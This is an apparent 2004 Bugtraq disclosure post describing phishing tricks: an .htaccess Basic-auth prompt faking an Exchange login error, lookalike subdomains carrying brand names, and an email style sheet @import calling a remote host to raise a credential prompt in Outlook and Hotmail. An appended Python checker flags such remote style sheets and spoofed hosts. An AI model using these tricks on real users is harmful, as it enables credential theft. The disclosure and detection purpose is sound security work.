Date: Fri, 21 May 2004 13:46:47 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Cc: <NTBugtraq@...tserv.ntbugtraq.com>
Subject: Stupid Phishing Tricks




Phriday, May 21, 2004

Several pheeble yet interesting phishing possibilities arise as 
phollows:

Take one .htaccess trivially modified to suit the target 
scenario:

AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
AuthType Basic

One throw-away domain which can include the target's host name:

http://www.hotmail.hackerguy.nickelandimehosting.com
http://www.evenlargerbank.money.nickelandimehosting.com
http://www.bloatedcorp.lackey.nickelandimehosting.com

A couple of ridiculous email contraptions:

<STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
 </STYLE>

1. Outlook Express

[screen shot http://www.malware.com/phool.png 56KB]

2. Outlook 2003

[screen shot: http://www.malware.com/ohlook.png 39KB]

note: the above 'style sheet' works on outbound [reply to] [so 
much for not downloading external content] inbound can be 
achieved as well via http://securityfocus.com/bid/10369 which 
has an even more convincing network login applet

3. Hotmail

[screen shot: http://www.malware.com/goturmail.png 91KB]

hint : hotmail[and other] web designer people; off-set the html 
login form on the site as many prime banks have done.

The possibilities are obviously endless.


BE AWARE OF THE SHARKS OUT THERE


NB: anyone have any contact or connection to the upper 
management security or abuse dept. of one public company called: 
SAVVIS Communications. http://savvis.net/ it appears their abuse 
dept. is woefully negligent in attending to abuse affairs.


End Call

-- 
http://www.malware.com
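
A mail-gateway style check for the two tricks in the message above, as an added example that is not part of the original post: it lists the remote style sheets an HTML message would make the client fetch, and flags hosts that carry a brand name as a label under an unrelated domain. The brand map, the function names and the last-two-labels domain rule are assumptions of this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed brand -> legitimate domain map (constructed for this example).
BRANDS = {"hotmail": "hotmail.com"}
# The style block quoted in the post, used as sample input.
SAMPLE = "<STYLE type=text/css>\n@import url( http://www.malware.com/pheesh );\n </STYLE>"
IMPORT_RE = re.compile(r"@import\s+(?:url\(\s*)?['\"]?([^'\"\s)]+)", re.I)

class StyleRefs(HTMLParser):
    """Collect <style> text and <link rel=stylesheet> targets."""
    def __init__(self):
        super().__init__()
        self.in_style, self.css, self.links = False, [], []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "style":
            self.in_style = True
        elif tag == "link" and "stylesheet" in (a.get("rel") or "").lower() and a.get("href"):
            self.links.append(a["href"])
    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False
    def handle_data(self, data):
        if self.in_style:
            self.css.append(data)

def brand_mismatch(host):
    """Return a brand that appears as a label of host outside its own domain."""
    labels = host.lower().rstrip(".").split(".")
    registrable = ".".join(labels[-2:])  # assumption: naive, no public-suffix list
    for brand, legit in BRANDS.items():
        if brand in labels and registrable != legit:
            return brand
    return None

def audit(html):
    """Return (url, host, spoofed_brand_or_None) for each remote style sheet."""
    p = StyleRefs()
    p.feed(html)
    p.close()
    findings = []
    for url in p.links + IMPORT_RE.findall("".join(p.css)):
        host = urlparse(url).hostname
        if host:  # relative references trigger no third-party fetch
            findings.append((url, host, brand_mismatch(host)))
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A gateway could strip or quarantine on any non-empty result, since a message body has no need to pull CSS from a third-party host.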





